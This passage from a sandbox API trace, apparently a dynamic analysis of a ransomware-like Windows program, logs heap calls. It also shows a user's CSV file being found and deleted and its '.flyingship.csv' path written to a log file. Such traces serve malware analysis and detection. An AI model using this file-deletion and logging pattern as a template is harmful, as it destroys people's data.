lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0179.767] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0179.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.768] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.768] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.768] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.769] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.769] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0179.769] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.769] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.769] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.771] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.771] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.771] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.771] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv", lpFilePart=0x0) returned 0x4e [0179.773] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x658e8210, ftCreationTime.dwHighDateTime=0x1d5e481, ftLastAccessTime.dwLowDateTime=0x5efc4c10, ftLastAccessTime.dwHighDateTime=0x1d5dba4, ftLastWriteTime.dwLowDateTime=0x106d2060, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xb478, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="RDv9Bzzuy Is9HIraE.csv", cAlternateFileName="RDV9BZ~1.CSV")) returned 0x90ae18 [0179.773] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\rdv9bzzuy is9hirae.csv")) returned 1 [0179.778] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x658e8210, ftCreationTime.dwHighDateTime=0x1d5e481, ftLastAccessTime.dwLowDateTime=0x5efc4c10, ftLastAccessTime.dwHighDateTime=0x1d5dba4, ftLastWriteTime.dwLowDateTime=0x106d2060, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xb478, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="RDv9Bzzuy Is9HIraE.csv", cAlternateFileName="RDV9BZ~1.CSV")) returned 0 [0179.778] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0179.779] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0179.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.779] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0179.780] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.781] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0179.781] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.781] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0179.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0179.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.782] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0179.782] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1b88, lpOverlapped=0x0) returned 1 [0179.782] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0179.782] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x1b88, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.782] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0179.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0179.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0179.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.flyingship.csv\r\n", cchWideChar=92, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 92 [0179.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5c) returned 0x9a5d10 [0179.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.flyingship.csv\r\n", cchWideChar=92, lpMultiByteStr=0x9a5d10, cbMultiByte=92, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.flyingship.csv\r\n", lpUsedDefaultChar=0x0) returned 92 [0179.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0179.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0179.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0179.783] WriteFile (in: hFile=0x138, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x5b, lpOverlapped=0x0) returned 1 [0179.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0179.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.784] CloseHandle (hObject=0x138) returned 1 [0179.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0179.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0179.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0179.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900058 | out: hHeap=0x8a0000) returned 1 [0179.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0179.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0179.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0179.787] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0179.787] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0179.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0179.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0179.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0179.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0179.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0179.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0179.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0179.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0179.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0179.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0179.789] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0179.789] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.789] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0179.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0179.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0179.789] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0179.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0179.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0179.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0179.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0179.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0179.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0179.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0179.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0179.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0179.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0179.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4e0 [0179.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0179.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0179.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0179.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0179.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0179.790] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0179.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0179.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0179.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0179.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0179.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0179.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0179.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0179.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0179.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0179.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0179.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.792] RtlAllocateHeap 